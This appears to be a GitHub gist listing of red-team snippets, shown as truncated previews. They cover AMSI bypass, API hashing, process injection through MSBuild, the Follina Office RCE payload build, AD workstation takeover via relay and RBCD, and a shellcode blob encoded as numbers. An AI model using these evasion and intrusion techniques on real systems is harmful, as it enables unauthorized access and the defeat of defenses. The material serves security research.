Skip to content

Instantly share code, notes, and snippets.

View checkymander's full-sized avatar

checkymander

224 followers · 10 following
View GitHub Profile
@checkymander
checkymander / LAPSDecrypt.cs
Created April 18, 2023 18:17 — forked from xpn/LAPSDecrypt.cs
Quick POC looking at how encryption works for LAPS (v2)
using System;
using System.Collections.Generic;
using System.DirectoryServices.Protocols;
using System.Globalization;
using System.Linq;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Security.Policy;
using System.Text;
using System.Threading.Tasks;
@checkymander
checkymander / Workstation-Takeover.md
Created October 18, 2022 17:19 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@checkymander
checkymander / api_hashing.cs
Created August 10, 2022 00:42 — forked from ASkyeye/api_hashing.cs
Proof of Concept Windows API Hashing in C#
using System;
using System.Runtime.InteropServices;
namespace API_Hashing
{
class Program
{
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
@checkymander
checkymander / patchless_amsi.h
Created August 7, 2022 22:26 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@checkymander
checkymander / output example.md
Created July 24, 2022 23:13
Shellcode as Numbers - A different kind of calc 
16683189189467061193223884768707748125115707836338683708165636755281807331517563442745553664246724105870945763631169132260927526462734007835204880152893128450692630721572368535326118279180786621255867502609753166175114825563868872386555313011639026159359514256068100949221759953685226158201564474886176814194560402374867089196278252086615234757715302275261377043585010851175293923132633446346692061723922182900523634608569996664845671316859814804344017463762348282301284946271053184374916659024239637068041261659983151054361127497750752691523039603283781627522436175359723245473438312970933225984151370749165828689332628371556231892597912020228904274172
166831891894670611932238847687077481251157078363386837081656367552818073315175634427455536642467241058709457636311691322609275264627340078352048801528931284506926307215723685353261182791807866212558675026097531661751148255638688723865553130116390261593595142560681009492217599536852261582015644748861768141945604023748670891962782520866152347577153022752613770435850
@checkymander
checkymander / no_strings.hpp
Created July 20, 2022 23:05 — forked from EvanMcBroom/no_strings.hpp
Encrypt Strings at Compile Time
// Copyright (C) 2022 Evan McBroom
// If you are using Visual Studio, you will need to disable the "Edit and Continue" feature.
// Prng based off of Parker Miller's
// "Multiplicative Linear Congruential Generator"
// https://en.wikipedia.org/wiki/Lehmer_random_number_generator
namespace mlcg {
constexpr uint32_t modulus() {
return 0x7fffffff;
}
@checkymander
checkymander / sleep.c
Last active August 2, 2022 17:05
/*!
*
* ROGUE
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation
* little tip: race condition at the RtlGetCtx so make a rop that sends an event if the rtl call finished
!*/
@checkymander
checkymander / ms-msdt.MD
Created May 30, 2022 17:49 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@checkymander
checkymander / msbuild_ntqueueapcthread
Created October 18, 2021 19:43 — forked from johnkhbaek/msbuild_ntqueueapcthread
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Original Author: Casey Smith, Twitter: @subTee -->
<!-- Modified by John Baek, @exploitpreacher to use ntqueueapcthread (https://github.com/FuzzySecurity/Sharp-Suite/tree/master/UrbanBishop) -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
@checkymander
checkymander / _notes.md
Created March 12, 2020 17:57
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.